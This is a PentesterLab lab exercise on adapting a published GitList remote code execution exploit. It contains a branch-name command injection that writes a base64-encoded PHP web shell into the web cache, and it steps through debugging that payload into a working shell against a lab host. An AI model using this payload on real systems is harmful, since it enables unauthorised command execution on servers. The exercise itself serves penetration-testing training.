Introduction

This course details the exploitation of multiple remote code execution in GitList. GitList is a stripped down version of Github. It allows developers to visualize multiple git repositories in their browsers.

If you want to try to solve this exercise on your own, you can use the user git with the password git to access the git repository over SSH:

$ git clone git@vulnerable:test.git

This exercise is based on a write-up published in the following blog http://hatriot.github.io/blog/2014/06/29/gitlist-rce/. However, the base64 payload will need to be modified to work against this target. The goal here is to learn how to understand and debug an existing payload to get it to work.

Debugging the payload

From this blog post, we get the following payload:

$ git checkout -b "|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"|base64\$IFS-d>/var/www/gitlist/cache/x"

$IFS is for Internal Field Separator and will allow us to separate the arguments from the command.

The payload does the following:

• echo the string PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==
• base64 decodes it.
• write the result to /var/www/gitlist/cache/x.

The string PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg== can be decoded on your system and will give us the payload use:

% echo PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg== | base64 -d

.

To try this payload, you will need to create the branch using git checkout, then you will need to push the branch. To do this, you can just push all branches using git push --all. Finally, you need to access the branch in the web interface to trigger the payload.

If we try this payload, we can then access the file directly: http://vulnerable/cache/x. However, it's showing our PHP code. It should not contain PHP code if the command was successful.

We can't run command as the file doesn't get interpreted as PHP code. We can still see that it's there as accessing http://vulnerable/cache/xx give us an error page.

To solve this issue, let's first rename the file from x to x.php and see what happens with this new branch. You will need to create the new branch, push it and access it in the web interface to finally see the file: http://vulnerable/cache/x.php.

If we access x.php, we can see that the payload still doesn't work. Another possible issue is that short tags are disabled. Short tags allow PHP developers to use <? instead of <?php and can be disabled in the PHP configuration using: short_open_tag = Off.

To test this, we need to modify the base64 part of the payload from <?system($_REQUEST['x']);?> to <?php system($_REQUEST['x']);?>. Then we need to re-encode it as base64, create the corresponding branch, push it and finally access it in the web interface.

Conclusion

This exercise explained to you how to take a working exploit and adapt it to your target. I hope you enjoyed learning with PentesterLab.